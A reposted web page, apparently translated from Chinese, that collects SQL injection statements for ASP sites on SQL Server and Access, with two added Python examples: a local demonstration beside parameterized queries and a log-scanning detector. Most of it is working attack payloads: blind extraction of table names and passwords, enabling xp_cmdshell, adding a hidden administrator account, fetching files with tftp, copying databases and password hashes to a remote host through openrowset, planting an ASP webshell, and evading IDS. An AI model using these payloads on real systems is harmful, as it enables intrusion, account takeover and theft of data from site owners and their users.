A collection of SQL injection statements

xiaoxiao, 2021-03-06

Standard injection statement:
    SQL = "SELECT PWD, Answer from [Member] where userid = '" & userid & "' and answer = '" & answer & "'"
When this is submitted, you only need to construct a special username and password according to the SQL, such as ' or '1'='1.
A statement with a problem:
    SQL = "SELECT PWD, Answer from [Member] where userid = '" & userid & "s ='" & answer & "'"
This low-level mistake is also made; here too you only need to construct a special username and password according to the SQL, such as ' or '1'='1.

1. Judge whether it is an injection point:
    and 1=1
    and 1=2

2. Guess the table name. The common names are nothing more than admin, adminuser, user, pass, password and so on.
    and 0<>(select count(*) from *)
    and 0<>(select count(*) from admin) -- judge whether an admin table exists

3. Guess the number of accounts: If you encounter 0 0) --

4. Guess the field names:
    and 1=(select count(*) from admin where len(name)>0)
    and 1=(select count(*) from admin where len(password)>0)

5. Guess the length of each field. Guessing the length means changing >0 until the correct page is returned.
    and 1=(select count(*) from admin where len(*)>0)
    and 1=(select count(*) from admin where len(name)>6) -- error
    and 1=(select count(*) from admin where len(name)>5) -- correct, so the length is 6
    and 1=(select count(*) from admin where len(name)=6) -- correct
    and 1=(select count(*) from admin where len(password)>11) -- correct
    and 1=(select count(*) from admin where len(password)>12) -- error, so the length is 12
    and 1=(select count(*) from admin where len(password)=12) -- correct

6. Guess the characters:
    and 1=(select count(*) from admin where left(name,1)=a) -- guess the first character of the username
    and 1=(select count(*) from admin where left(name,2)=ab) -- guess the second character of the username
Guess one character at a time like this; once you have guessed enough, the account comes out.
    and 1=(select top 1 count(*) from admin where asc(mid(pass,5,1))=51) -- this query can guess Chinese usernames and passwords; just change the trailing number to the Chinese character code, and finally convert the result back to characters.

    group by users.id having 1=1 --
    group by users.id, users.username, users.password, users.privs having 1=1 --
    ; insert into users values(666, attacker, foobar, 0xffff) --
    union select top 1 column_name from information_schema.columns where table_name=logintable --
    union select top 1 column_name from information_schema.columns where table_name=logintable where column_name not in (login_id) --
    union select top 1 column_name from information_schema.columns where table_name=logintable where column_name not in (login_id, login_name) --
    union select top 1 login_name from logintable --
    union select top 1 password from logintable where login_name=rahul --

Check whether the server has been patched (an error means the patch is applied; I have applied the SP4 patch):
    and 1=(select @@version) --
Check the permission of the database connection account; if the page returns normally, the connection account has the sysadmin server role:
    and 1=(select is_srvrolemember(sysadmin)) --
Judge the database connection account (connecting with the sa account returns normally, which proves the connection account is sa):
    and sa=(select system_user) --
    and user_name()=dbo --
    and 0<>(select user_name()) --
Whether xp_cmdshell has been deleted:
    and 1=(select count(*) from master.dbo.sysobjects where xtype=x and name=xp_cmdshell) --
If xp_cmdshell has been deleted, restore it; an absolute path is also supported:
    ; exec master.dbo.sp_addextendedproc xp_cmdshell, xplog70.dll --
    ; exec master.dbo.sp_addextendedproc xp_cmdshell, c:/inetpub/wwwroot/xplog70.dll --
Reverse ping (tested myself):
    ; use master; declare @s int; exec sp_oacreate "wscript.shell", @s out; exec sp_oamethod @s, "run", null, "cmd.exe /c ping 192.168.0.1"; --
Add an account:
    ; declare @shell int exec sp_oacreate wscript.shell, @shell output exec sp_oamethod @shell, run, null, c:/winnt/system32/cmd.exe /c net user jiaoniang$ 1866574 /add --
Create a virtual directory for drive E:
    ; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, null, cscript.exe c:/inetpub/wwroot/mkwebdir.vbs -w "default web site" -v "e", "e:/" --
Access attributes (for writing a webshell):
    declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, null, cscript.exe c:/inetpub/wwroot/chaccess.vbs -a w3svc/1/root/e browse
Special tip for exposing the database path: %5c = /, that is, replace / with %5c when submitting.
    and 0<>(select top 1 paths from newtable) --
Get the database name (dbid 1 to 5 are the system databases; 6 and above can be judged):
    and 1=(select name from master.dbo.sysdatabases where dbid=7) --
    and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
Submit dbid=7, 8, 9 ... to get more database names.
    and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=u) -- get a table; assume it is admin
    and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=u and name not in (admin)) -- get the other tables
    and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=u and name=admin and uid>(str(id))) -- get the id value; assume it is 18779569 (uid=id)
    and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569) -- get a field of admin; assume it is user_id
    and 0<>(select top 1 name from bbs.dbo.syscolumns where id=18779569 and name not in (id, ...)) -- get the other fields
    and 0<(select user_id from bbs.dbo.admin where username>1) -- you can get the password in order ...
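As an added example (not from the original page), the concatenated [Member] login query the page opens with and the id=51 and 1=1 / and 1=2 probe, run against a constructed in-memory SQLite table beside parameterized versions, so the bypass, the page-difference oracle, and what parameterization does to both can be checked offline. The table contents, the news table and the function names are assumptions of this example.

```python
"""Added example, not from the original page: the concatenated [Member] login
query the page opens with and the id=51 and 1=1 probe, run against a constructed
in-memory SQLite table beside parameterized versions. Table rows and the news
table are constructed here; column names follow the page's query."""
import sqlite3
from typing import List, Optional, Tuple

Row = Tuple[str, str]


def make_db() -> sqlite3.Connection:
    """Constructed sample schema: two members and one news item."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE Member (userid TEXT, pwd TEXT, answer TEXT);"
        "INSERT INTO Member VALUES ('alice', 'alicepw', 'blue');"
        "INSERT INTO Member VALUES ('bob', 'bobpw', 'cat');"
        "CREATE TABLE news (id INTEGER, title TEXT);"
        "INSERT INTO news VALUES (51, 'hello');"
    )
    return con


def vulnerable_lookup(con, userid: str, answer: str) -> List[Row]:
    """Same shape as the page's SQL = "... userid = '" & userid & "' and
    answer = '" & answer & "'": quotes in the input become SQL syntax."""
    sql = ("SELECT pwd, answer FROM Member WHERE userid = '" + userid
           + "' AND answer = '" + answer + "'")
    return con.execute(sql).fetchall()


def safe_lookup(con, userid: str, answer: str) -> List[Row]:
    """Parameterized form: the driver binds the values, quotes stay data."""
    sql = "SELECT pwd, answer FROM Member WHERE userid = ? AND answer = ?"
    return con.execute(sql, (userid, answer)).fetchall()


def vulnerable_news(con, news_id: str) -> List[Tuple[str]]:
    """Unquoted numeric parameter concatenated as in shownews.asp?id=51:
    'and 1=1' keeps the row, 'and 1=2' drops it. That page difference is the
    oracle behind the page's len()/left()/asc() guessing."""
    return con.execute("SELECT title FROM news WHERE id = " + news_id).fetchall()


def safe_news(con, news_id: str) -> Optional[List[Tuple[str]]]:
    """Validate the type before SQL sees it; None means the input was rejected."""
    try:
        value = int(news_id)
    except ValueError:
        return None
    return con.execute("SELECT title FROM news WHERE id = ?", (value,)).fetchall()


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_lookup(db, "' or '1'='1", "' or '1'='1"))  # both rows
    print(safe_lookup(db, "' or '1'='1", "' or '1'='1"))        # []
    print(vulnerable_news(db, "51 and 1=2"), safe_news(db, "51 and 1=2"))
```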

Assume the fields are user_id, username, password and so on.
    and 0<>(select count(*) from master.dbo.sysdatabases where name>1 and dbid=6)
    and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=u) -- get a table name
    and 0<>(select top 1 name from bbs.dbo.sysobjects where xtype=u and name not in (address))
    and 0<>(select count(*) from bbs.dbo.sysobjects where xtype=u and name=admin and uid>(id)) -- determine the id value
    and 0<>(select top 1 name from bbs.dbo.syscolumns where id=773577794) -- all the fields
    ?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
    ?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin (union, Access)
Get the web path:
    ; create table [dbo].[swap] ([swappass] [char](255)); --
    and (select top 1 swappass from swap)=1 --
    ; create table newtable (id int id id id ")
    declare @test varchar(20) exec master..xp_regread @rootkey=HKEY_LOCAL_MACHINE, @key=system/currentcontrolset/services/w3svc/parameters/virtual roots/, @value_name=/, value=@test output insert into paths (path) values(@test) --
    ; use ku1; --
    ; create table cmd (str image); -- create a table cmd of image type
Test whether xp_cmdshell exists:
    ; exec master..xp_cmdshell dir
    ; exec master.dbo.sp_addlogin jiaoniang$; -- add a SQL account
    ; exec master.dbo.sp_password null, jiaoniang$, 1866574; --
    ; exec master.dbo.sp_addsrvrolemember jiaoniang$ sysadmin; --
    ; exec master.dbo.xp_cmdshell net user jiaoniang$ 1866574 /workstations:* /times:all /passwordchg:yes /passwordreq:yes /active:yes /add; --
    ; exec master.dbo.xp_cmdshell net localgroup administrators jiaoniang$ /add; --
    exec master..xp_servicecontrol start, schedule -- start services
    exec master..xp_servicecontrol start, server
    ; declare @shell int exec sp_oacreate wscript.shell, @shell output exec sp_oamethod @shell, run, null, c:/winnt/system32/cmd.exe /c net user jiaoniang$ 1866574 /add
    ; declare @shell int exec sp_oacreate wscript.shell, @shell output exec sp_oamethod @shell, run, null, c:/winnt/system32/cmd.exe /c net localgroup administrators jiaoniang$ /add
    ; exec master..xp_cmdshell tftp -i youip get file.exe -- upload a file with tftp
    ; declare @a sysname set @a=xp_cmdshell exec @a dir c:/
    ; declare @a sysname set @a=xp_cm' 'dshell exec @a dir c:/
    ; declare @a; set @a=db_name(); backup database @a to disk=your IP your shared directory bak.dat -- this works
    select * from openrowset(sqloledb, server;sa;, select ok! exec master.dbo.sp_addlogin hax)
Query construction:
    select * from news where id=... and topic=... and admin
    and 1=(select count(*) from [user] where username=victim and right(left(userpass,01),1)=1) and userpass<>
    select 123; --
    ; a or name like fff%; -- shows a user named ffff

    and 1<>(email"); --
    ; update [users] set email=(select top 1 name from sysobjects where xtype=u and status>0) where name=fff
    ; update [users] set email=(select top 1 id from sysobjects where xtype=u and name=ad) where name=fff; --
    ; update [users] set email=(select top 1 name from sysobjects where xtype=u and id>581577110) where name=fff; --
    ; update [users] set email=(select top 1 count(id) where name=fff; --
    ; update [users] set email=(select top 1 pwd from password where id=2) where name=fff; --
    ; update [users] set email=(select top 1 name from password where id=2) where name=fff; --
The statements above fetch the database's first user table and put the table name into the email field of user ffff. By looking at ffff's user information you get the first table, called ad; from the table name ad you get the id of that table, and with it the second table.
    insert into users values(666, char(0x63) char(0x68) char(0x72) char(0x69) char(0x73), char(0x63) char(0x68) char(0x72) char(0x69) char(0x73), 0xfff) --
    insert into users values(667, 123, 123, 0xfffff) --
    insert into users values(123, admin --, password, 0xfff) --
    ; and user>0
    ; and (select count(*) from sysobjects)>0
    ; and (select count(*) from mysysobjects)>0 // enumerate the table names of an Access database
    ; update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0); -- this updates the first table name into the aaa field. Read the first table; then the second table can be read out by adding the table name just obtained to the condition.
    update aaa set aaa=(select top 1 name from sysobjects where xtype=u and status>0 and name<>vote); --
then
    id=1552 and exists(select * from aaa where aaa>5)
reads the second table; continue one by one until there are no more.

Reading the fields is like this:
    update aaa set aaa=(select top 1 col_name(object_id(table name),1)); --
then
    id=152 and exists(select * from aaa where aaa>5) -- error, get the field name
    update aaa set aaa=(select top 1 col_name(object_id(name),2)); --
then
    id=152 and exists(select * from aaa where aaa>5) -- error, get the field name

[Get the data table names] [Update a field value to a table name; then you can get the table name]
    update table_name set field=(select top 1 name from sysobjects where xtype=u and status>0 [and name<>table name you already got, adding one each time]) [where condition]
    select top 1 name from sysobjects where xtype=u and status>0 and name not in (table1, table2, ...)
Injection vulnerability: database administrator account and system administrator account [the current account must be in the sysadmin group].
[Get the data table field names] [Update a field value to a field name; then reading the value of that field gives a field name]
    update table_name set field=(select top 1 col_name(object_id(data table name to query), field serial number: 1)) [where condition]
Bypassing IDS detection [use a variable]:
    ; declare @a sysname set @a=xp_cmdshell exec @a dir c:/
    ; declare @a sysname set @a=xp_cm' 'dshell exec @a dir c:/

1. Open a remote database. Basic syntax:
    select * from openrowset(sqloledb, server=servername;uid=sa;pwd=123, select * from table1)
   Parameters: (1) the OLEDB provider name.
2. The connection string parameters can be used to connect, such as:
    select * from openrowset(sqloledb, uid=sa;pwd=123;Network=dbmssocn;address=192.168.0.1,1433;, select * from table)
3. Copy the entire database of the target host into a table (INSERT). Basic syntax:
    insert into openrowset(sqloledb, server=servername;uid=sa;pwd=123, select * from table1) select * from table2
This statement copies all the data in table2 into the table1 table of the target host's database.

In actual use, the IP address and port in the connection string are modified as appropriate, pointing to wherever you need, for example:
    insert into openrowset(sqloledb, uid=sa;pwd=123;Network=dbmssocn;address=192.168.0.1,1433;, select * from table1) select * from table2
    insert into openrowset(sqloledb, uid=sa;pwd=123;Network=dbmssocn;address=192.168.0.1,1433;, select * from _sysdatabases) select * from master.dbo.sysdatabases
    insert into openrowset(sqloledb, uid=sa;pwd=123;Network=dbmssocn;address=192.168.0.1,1433;, select * from _sysobjects) select * from user_database.dbo.sysobjects
    insert into openrowset(sqloledb, uid=sa;pwd=123;Network=dbmssocn;address=192.168.0.1,1433;, select * from _syscolumns) select * from user_database.dbo.syscolumns
Replicate the database:
    insert into openrowset(sqloledb, uid=sa;pwd=123;Network=dbmssocn;address=192.168.0.1,1433;, select * from table1) select * from database..table1
    insert into openrowset(sqloledb, uid=sa;pwd=123;Network=dbmssocn;address=192.168.0.1,1433;
The password hashes are stored in sysxlogins, as follows:
    insert into openrowset(sqloledb, uid=sa;pwd=123;Network=dbmssocn;address=192.168.0.1,1433;, select * from _sysxlogins) select * from database.dbo.sysxlogins
After the hashes are obtained, they can be cracked by brute force.

Ways to traverse directories. First create a temporary table temp:
    ; create table temp (id nvarchar(255), num1 nvarchar(255), num3 nvarchar(255)); --
    ; insert temp exec master.dbo.xp_availablemedia; -- get all current drives
    ; insert into temp (id) exec master.dbo.xp_subdirs c:/; -- list the subdirectories
    ; insert into temp (id, num1) exec master.dbo.xp_dirtree c:/; -- get the directory tree of all subdirectories and insert it into the temp table
    ; insert into temp (id) exec master.dbo.xp_cmdshell type c:/web/index.asp; -- view the content of a file
    ; insert into temp (id) exec master.dbo.xp_cmdshell dir c:/; --
    ; insert into temp (id) exec master.dbo.xp_cmdshell dir c:/*.asp /s /a; --
    ; insert into temp (id) exec master.dbo.xp_cmdshell cscript c:/inetpub/adminscripts/adsutil.vbs enum w3svc
    ; insert into temp (id, num1) exec master.dbo.xp_dirtree c:/; -- (xp_dirtree is available to public)

Write to a table:
    Statement 1: and 1=(select is_srvrolemember(sysadmin)); --
    Statement 2: and 1=(select is_srvrolemember(serveradmin)); --
    Statement 3: and 1=(select is_srvrolemember(setupadmin)); --
    Statement 4: and 1=(select is_srvrolemember(securityadmin)); --
    Statement 5: and 1=(select is_srvrolemember(securityadmin)); --
    Statement 6: and 1=(select is_srvrolemember(diskadmin)); --
    Statement 7: and 1=(select is_srvrolemember(bulkadmin)); --
    Statement 8: and 1=(select is_srvrolemember(bulkadmin)); --
    Statement 9: and 1=(select is_member(db_owner)); --

Write the paths into a table:
    ; create table dirs (paths varchar(100), id int) --
    ; insert dirs exec master.dbo.xp_dirtree c:/ --
    and 0<>(select top 1 paths from dirs) --
    and 0<>(select top 1 paths from dirs where paths not in (@inetpub)) --
    ; create table dirs1 (paths varchar(100), id int) --
    ; insert dirs exec master.dbo.xp_dirtree e:/web --
    and 0<>(select top 1 paths from dirs1) --
Back in the web directory, download:
    ; declare @a sysname; set @a=db_name(); backup database @a to disk=e:/web/down.bak; --
    and 1=(select top 1 name from (select top 12 id, name from sysobjects where xtype=char(85)) t order by id desc)
    and 1=(select top 1 col_name(object_id(user_login),1) from sysobjects) -- see the related tables

    and 1=(select user_id from user_login)
    and 0=(select user from user_login where user>1)

-=- wscript.shell example -=-
    declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, null, notepad.exe
    ; declare @o int exec sp_oacreate wscript.shell, @o out exec sp_oamethod @o, run, null, notepad.exe --
    declare @o int, @f int, @t int, @ret int declare @line varchar(8000) exec sp_oacreate scripting.filesystemobject, @o out exec sp_oamethod @o, opentextfile, @f out, c:/boot.ini, 1 exec @ret=sp_oamethod @f, readline, @line out while (@ret=0) begin print @line exec @ret=sp_oamethod @f, readline, @line out end
    declare @o int, @f int, @t int, @ret int exec sp_oacreate scripting.filesystemobject, @o out exec sp_oamethod @o, createtextfile, @f out, c:/inetpub/wwwroot/foo.asp, 1 exec @ret=sp_oamethod @f, writeline, null, <% set o=server.createobject("wscript.shell"): o.run(request.querystring("cmd")) %>
    declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, null, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, null, all your sequel servers are belong to us, 528 waitfor delay 00:00:05
    ; declare @o int, @ret int exec sp_oacreate speech.voicetext, @o out exec sp_oamethod @o, register, null, foo, bar exec sp_oasetproperty @o, speed, 150 exec sp_oamethod @o, speak, null, all your sequel servers are belong to us, 528 waitfor delay 00:00:05 --

xp_dirtree is available to the public role:
    exec master.dbo.xp_dirtree c:/
The information returned has two fields, subdirectory and depth. The subdirectory field is character type and the depth field is integer type.
    create table dirs (paths varchar(100), id int)
The table created here corresponds to what xp_dirtree returns: the same number of fields and the same types.
    insert dirs exec master.dbo.xp_dirtree c:/
As long as the table we define matches the fields the stored procedure returns, this can be executed! This achieves the effect of writing into a table, and step by step we get the information we want.

Whether multiple queries are supported:
    http://www.xxx.com/xxxnews/shownews.asp?id=51; declare @a int--

Whether subqueries are supported:
    http://www.xxx.com/xxxnews/shownews.asp?id=51 and (select count(1) from [sysobjects])>=0

Return the user name:
    http://www.xxx.com/xxxnews/shownews.asp?id=51 and user%2bchar(124)=0

Whether the current user is a member of the sysadmin fixed server role:
    http://www.xxx.com/xxxnews/shownews.asp?id=51 and cast(is_srvrolemember(0x730079007300610064006D0069006E00) as varchar(1))%2bchar(124)=1

PS: 0x730079007300610064006D0069006E00 = sysadmin

Whether the current user is a member of the db_owner fixed database role:
    http://www.xxx.com/xxxnews/shownews.asp?id=51 and cast(is_member(0x640062005f006f0077006e0065007200) as varchar(1))%2bchar(124)=1

0x640062005f006f0077006e0065007200 = db_owner

Return the database name:
    http://www.xxx.com/xxxnews/shownews.asp?id=51 and db_name()%2bchar(124)=0

Operating system and SQL Server version:
    http://www.99568.com/99568news/shownews.asp?id=51 and @@version=1

Local server name:
    http://www.99568.com/99568news/shownews.asp?id=51 and @@servername=1
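As an added example (not from the original page), a detector for the probes listed on this page (and 1=1, is_srvrolemember/is_member, user+char(124), db_name(), @@version, @@servername, xp_cmdshell, sp_oacreate, openrowset, stacked ;exec) run over constructed web-server log lines; it decodes the 0x... literals as UTF-16LE, which is how the PS lines above arrive at sysadmin and db_owner. The log lines, the 10.0.0.5 client, the pattern set and the function names are assumptions of this example.

```python
"""Added example, not from the original page: a detector for the probes this
page lists (and 1=1, is_srvrolemember/is_member, user+char(124), db_name(),
@@version, @@servername, xp_cmdshell, sp_oacreate, openrowset, stacked ;exec)
run over constructed web-server log lines. It URL-decodes each request and
decodes 0x... literals as UTF-16LE, which is how 0x7300...6E00 reads as
sysadmin. The log lines, client address and host path are constructed."""
import re
from typing import Dict, List, Optional
from urllib.parse import unquote_plus

SAMPLE_LOG = """\
10.0.0.5 - - [06/Mar/2021:10:00:01 +0000] "GET /xxxnews/shownews.asp?id=51 HTTP/1.1" 200 5120
10.0.0.5 - - [06/Mar/2021:10:00:02 +0000] "GET /xxxnews/shownews.asp?id=51%20and%201=1 HTTP/1.1" 200 5120
10.0.0.5 - - [06/Mar/2021:10:00:03 +0000] "GET /xxxnews/shownews.asp?id=51%20and%20cast(is_srvrolemember(0x730079007300610064006D0069006E00)%20as%20varchar(1))%2bchar(124)=1 HTTP/1.1" 500 310
10.0.0.5 - - [06/Mar/2021:10:00:04 +0000] "GET /xxxnews/shownews.asp?id=51;exec%20master..xp_cmdshell%20'dir'-- HTTP/1.1" 500 310
10.0.0.5 - - [06/Mar/2021:10:00:05 +0000] "GET /xxxnews/shownews.asp?id=52 HTTP/1.1" 200 4980
"""

# One pattern per category, each taken from the statements on this page.
PATTERNS = {
    "boolean_probe": re.compile(r"\band\s+\d+\s*=\s*\d+", re.I),
    "role_check": re.compile(r"\bis_(?:srvrole)?member\s*\(", re.I),
    "server_info": re.compile(
        r"@@(?:version|servername)|\bdb_name\s*\(|\bsystem_user\b|\buser\s*\+", re.I),
    "command_exec": re.compile(
        r"\b(?:xp_cmdshell|sp_oacreate|sp_oamethod|openrowset|xp_dirtree|xp_regread)\b", re.I),
    "stacked_query": re.compile(r";\s*(?:exec|declare|insert|update|create|backup)\b", re.I),
}
HEX_LITERAL = re.compile(r"0x((?:[0-9a-fA-F]{2})+)")
REQUEST_LINE = re.compile(r'"(?:GET|POST)\s+(\S+)')


def decode_hex_literals(text: str) -> List[str]:
    """Decode 0x... literals. Fed to an nvarchar parameter as on this page,
    SQL Server reads them as UTF-16LE, so even-length blobs decode that way."""
    out = []
    for m in HEX_LITERAL.finditer(text):
        raw = bytes.fromhex(m.group(1))
        codec = "utf-16-le" if len(raw) % 2 == 0 else "latin-1"
        out.append(raw.decode(codec, errors="replace"))
    return out


def scan_request(line: str) -> Optional[Dict]:
    """Matched categories for one access-log line, or None if it is clean."""
    m = REQUEST_LINE.search(line)
    if not m:
        return None
    query = unquote_plus(m.group(1))  # %20 -> space, %2b -> '+'
    hits = [name for name, rx in PATTERNS.items() if rx.search(query)]
    if not hits:
        return None
    return {"query": query, "hits": hits, "decoded": decode_hex_literals(query)}


def scan_log(text: str) -> List[Dict]:
    """Run scan_request over every line and keep only the flagged ones."""
    return [r for r in (scan_request(l) for l in text.splitlines()) if r]
```

Matching on the decoded query string rather than the raw log line is what makes the %20/%2b-encoded probes above visible to the patterns.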

Please credit the original source when reposting: https://www.9cbs.com/read-74449.html
